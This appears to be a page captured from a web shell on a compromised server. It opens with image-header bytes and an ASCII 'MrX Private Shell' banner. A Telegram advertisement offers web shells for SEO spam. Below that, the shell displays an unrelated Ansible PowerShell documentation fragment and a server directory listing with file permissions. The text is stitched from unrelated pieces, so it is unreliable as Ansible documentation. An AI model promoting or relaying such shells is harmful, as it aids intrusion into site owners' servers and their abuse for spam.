����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Copyright (c) 2019 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
class ModuleDocFragment(object):
# Windows shell documentation fragment
# FIXME: set_module_language don't belong here but must be set so they don't fail when someone
# get_option('set_module_language') on this plugin
DOCUMENTATION = r"""
options:
async_dir:
description:
- Directory in which ansible will keep async job information.
- Before Ansible 2.8, this was set to C(remote_tmp + "\.ansible_async").
default: '%USERPROFILE%\.ansible_async'
ini:
- section: powershell
key: async_dir
vars:
- name: ansible_async_dir
version_added: '2.8'
remote_tmp:
description:
- Temporary directory to use on targets when copying files to the host.
default: '%TEMP%'
ini:
- section: powershell
key: remote_tmp
vars:
- name: ansible_remote_tmp
set_module_language:
description:
- Controls if we set the locale for modules when executing on the
target.
- Windows only supports C(no) as an option.
type: bool
default: 'no'
choices: ['no', False]
environment:
description:
- List of dictionaries of environment variables and their values to use when
executing commands.
keyword:
- name: environment
type: list
elements: dictionary
default: [{}]
"""
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| __init__.py | File | 0 B | 0644 |
|
| action_common_attributes.py | File | 2.39 KB | 0644 |
|
| action_core.py | File | 2.84 KB | 0644 |
|
| backup.py | File | 560 B | 0644 |
|
| connection_pipelining.py | File | 1.2 KB | 0644 |
|
| constructed.py | File | 2.9 KB | 0644 |
|
| decrypt.py | File | 539 B | 0644 |
|
| default_callback.py | File | 3.18 KB | 0644 |
|
| files.py | File | 4.59 KB | 0644 |
|
| inventory_cache.py | File | 2.14 KB | 0644 |
|
| result_format_callback.py | File | 1.95 KB | 0644 |
|
| return_common.py | File | 1.06 KB | 0644 |
|
| shell_common.py | File | 3.48 KB | 0644 |
|
| shell_windows.py | File | 1.49 KB | 0644 |
|
| template_common.py | File | 4.57 KB | 0644 |
|
| url.py | File | 2.78 KB | 0644 |
|
| url_windows.py | File | 5.43 KB | 0644 |
|
| validate.py | File | 885 B | 0644 |
|
| vars_plugin_staging.py | File | 947 B | 0644 |
|